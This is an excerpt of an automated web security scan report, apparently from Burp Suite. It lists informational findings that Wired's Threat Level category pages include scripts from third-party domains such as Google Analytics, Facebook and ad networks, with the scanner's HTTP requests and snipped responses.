
6.103. http://www.wired.com/threatlevel/category/e-voting/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/e-voting/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/e-voting/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:53 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=215
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:29:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.104. http://www.wired.com/threatlevel/category/elections/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/elections/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/elections/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=263
Expires: Wed, 12 Jan 2011 15:34:13 GMT
Date: Wed, 12 Jan 2011 15:29:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.105. http://www.wired.com/threatlevel/category/fed-blotter/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/fed-blotter/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/fed-blotter/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:05 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=189
Expires: Wed, 12 Jan 2011 15:33:06 GMT
Date: Wed, 12 Jan 2011 15:29:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.106. http://www.wired.com/threatlevel/category/glitches-and-bugs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/glitches-and-bugs/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/glitches-and-bugs/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:19 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=158
Expires: Wed, 12 Jan 2011 15:32:37 GMT
Date: Wed, 12 Jan 2011 15:29:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.107. http://www.wired.com/threatlevel/category/hacks-and-cracks/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/hacks-and-cracks/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/hacks-and-cracks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:29 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=167
Expires: Wed, 12 Jan 2011 15:32:48 GMT
Date: Wed, 12 Jan 2011 15:30:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.108. http://www.wired.com/threatlevel/category/hans-reiser-trial/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/hans-reiser-trial/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/hans-reiser-trial/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:41 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=250
Expires: Wed, 12 Jan 2011 15:34:18 GMT
Date: Wed, 12 Jan 2011 15:30:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.109. http://www.wired.com/threatlevel/category/identification/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/identification/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/identification/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:49 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=188
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:30:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.110. http://www.wired.com/threatlevel/category/intellectual-property/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/intellectual-property/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/intellectual-property/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:03 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=213
Expires: Wed, 12 Jan 2011 15:33:52 GMT
Date: Wed, 12 Jan 2011 15:30:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.111. http://www.wired.com/threatlevel/category/lori-drew-trial/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/lori-drew-trial/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/lori-drew-trial/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:09 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=98
Expires: Wed, 12 Jan 2011 15:32:12 GMT
Date: Wed, 12 Jan 2011 15:30:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.112. http://www.wired.com/threatlevel/category/network-neutrality/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/network-neutrality/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/network-neutrality/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=147
Expires: Wed, 12 Jan 2011 15:33:10 GMT
Date: Wed, 12 Jan 2011 15:30:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.113. http://www.wired.com/threatlevel/category/nsa/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/nsa/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/nsa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=150
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:30:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.114. http://www.wired.com/threatlevel/category/openleaks/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/openleaks/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/openleaks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:12 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=139
Expires: Wed, 12 Jan 2011 15:33:18 GMT
Date: Wed, 12 Jan 2011 15:30:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.115. http://www.wired.com/threatlevel/category/politics/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/politics/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/politics/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=124
Expires: Wed, 12 Jan 2011 15:33:09 GMT
Date: Wed, 12 Jan 2011 15:31:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.116. http://www.wired.com/threatlevel/category/porn/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/porn/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/porn/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:30:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=174
Expires: Wed, 12 Jan 2011 15:34:06 GMT
Date: Wed, 12 Jan 2011 15:31:12 GMT
Connection: close
Connection: Transfer-Encoding
